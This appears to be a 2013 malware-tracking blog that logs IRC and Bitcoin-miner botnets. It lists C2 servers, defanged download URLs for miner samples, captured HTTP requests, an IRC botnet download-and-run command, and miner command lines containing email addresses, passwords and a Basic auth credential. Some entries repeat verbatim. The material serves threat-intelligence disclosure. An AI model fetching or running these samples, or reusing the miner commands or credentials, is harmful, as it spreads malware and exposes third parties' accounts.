Thanks to this guy for the sample
Resolved : [t7v4d.com] To [108.170.24.42]
Server: t7v4d.com:4040
Now talking in ##tnt
Topic is '!np hxxp://3rbcool.net/g1.exe DF37A37D9E33FB9904235855863AA5D5 -r'
hosting infos:
http://whois.domaintools.com/108.170.24.42
Sunday, May 19, 2013
privatesmartscreen.nl(Bitcoin Miner hosted in Netherlands Amsterdam Denkers-ict B.v.)
DNS Queries: privatesmartscreen.nl DNS_TYPE_A 159.253.0.151
HTTP Conversations:
159.253.0.151:80 - [privatesmartscreen.nl]
Request: GET /Bitcoin/host.txt
149.210.128.55:80 - [149.210.128.55]
Request: GET /bitconi/winlogon32.exe
Request: GET /bitconi/winlogon64.exe
Request: GET /bitconi/usft_ext.dll
Request: GET /bitconi/miner.dll
Request: GET /bitconi/coinutil.dll
Request: GET /ptx.exe
Request: GET /bitconi/btc.exe
Request: GET /bitconi/phatk.exe
Dutch hecker here: winlogon32.exe" -o hxxp://pool.50btc.com:8332/ -u jeroengroenveld@live.nl_Apex -p omega321
Samples:
hxxp://149.210.128.55/bitconi/winreg.exe
hxxp://149.210.128.55/bitconi/winlogon64.exe
hxxp://149.210.128.55/bitconi/winlogon32.exe
hxxp://149.210.128.55/bitconi/usft_ext.dll
hxxp://149.210.128.55/bitconi/miner.dll
hxxp://149.210.128.55/bitconi/coinutil.dll
hosting infos:
http://whois.domaintools.com/159.253.0.151
http://whois.domaintools.com/149.210.128.55
HTTP Conversations:
159.253.0.151:80 - [privatesmartscreen.nl]
Request: GET /Bitcoin/host.txt
149.210.128.55:80 - [149.210.128.55]
Request: GET /bitconi/winlogon32.exe
Request: GET /bitconi/winlogon64.exe
Request: GET /bitconi/usft_ext.dll
Request: GET /bitconi/miner.dll
Request: GET /bitconi/coinutil.dll
Request: GET /ptx.exe
Request: GET /bitconi/btc.exe
Request: GET /bitconi/phatk.exe
Dutch hecker here: winlogon32.exe" -o hxxp://pool.50btc.com:8332/ -u jeroengroenveld@live.nl_Apex -p omega321
Samples:
hxxp://149.210.128.55/bitconi/winreg.exe
hxxp://149.210.128.55/bitconi/winlogon64.exe
hxxp://149.210.128.55/bitconi/winlogon32.exe
hxxp://149.210.128.55/bitconi/usft_ext.dll
hxxp://149.210.128.55/bitconi/miner.dll
hxxp://149.210.128.55/bitconi/coinutil.dll
hosting infos:
http://whois.domaintools.com/159.253.0.151
http://whois.domaintools.com/149.210.128.55
Saturday, May 18, 2013
pool.50btc.com(Bitcoin Miner botnet hosted in Germany Gunzenhausen Magdevelopers)
Resolved : [pool.50btc.com] To [144.76.52.43]
HTTP Requests:
hxxp://pool.50btc.com:8332/
DATA:
POST / HTTP/1.1
Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==
Content-Length: 128
X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchto
User-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3)
Host: pool.50btc.com:8332
Cache-Control: no-cache
{"method": "getblocktemplate", "params": [{"capabilities": ["coinbasetxn", "workid", "coinbase/append", "longpollid"]}], "id":0}
Here the hecker:
lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332
Sample:hxxp://158.255.2.104/cucaz.exe
hosting infos:
http://whois.domaintools.com/144.76.52.43
HTTP Requests:
hxxp://pool.50btc.com:8332/
DATA:
POST / HTTP/1.1
Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==
Content-Length: 128
X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchto
User-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3)
Host: pool.50btc.com:8332
Cache-Control: no-cache
{"method": "getblocktemplate", "params": [{"capabilities": ["coinbasetxn", "workid", "coinbase/append", "longpollid"]}], "id":0}
Here the hecker:
lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332
Sample:hxxp://158.255.2.104/cucaz.exe
hosting infos:
http://whois.domaintools.com/144.76.52.43
hi.loldump.org(irc botnet hosted in France Roubaix Ovh Systems)
Resolved : [hi.loldump.org] To [176.31.123.56]
Server: 176.31.123.56:8782
Server Password:
Username: __x00
Nickname: {iNF-00-DEU-XP-DELL-9523}
Channel: #scanner# (Password: )
Channeltopic: :.join #scanner2
hosting infos:
http://whois.domaintools.com/176.31.123.56
Server: 176.31.123.56:8782
Server Password:
Username: __x00
Nickname: {iNF-00-DEU-XP-DELL-9523}
Channel: #scanner# (Password: )
Channeltopic: :.join #scanner2
hosting infos:
http://whois.domaintools.com/176.31.123.56
Friday, May 17, 2013
95.86.207.142(irc botnet hosted in Russian Federation Yaroslavl' Ojsc Rostelecom Yaroslavl Branch)
Server:95.86.207.142 1866
Channel:#!x!
hosting infos:
http://whois.domaintools.com/95.86.207.142
Channel:#!x!
hosting infos:
http://whois.domaintools.com/95.86.207.142
Subscribe to:
Posts (Atom)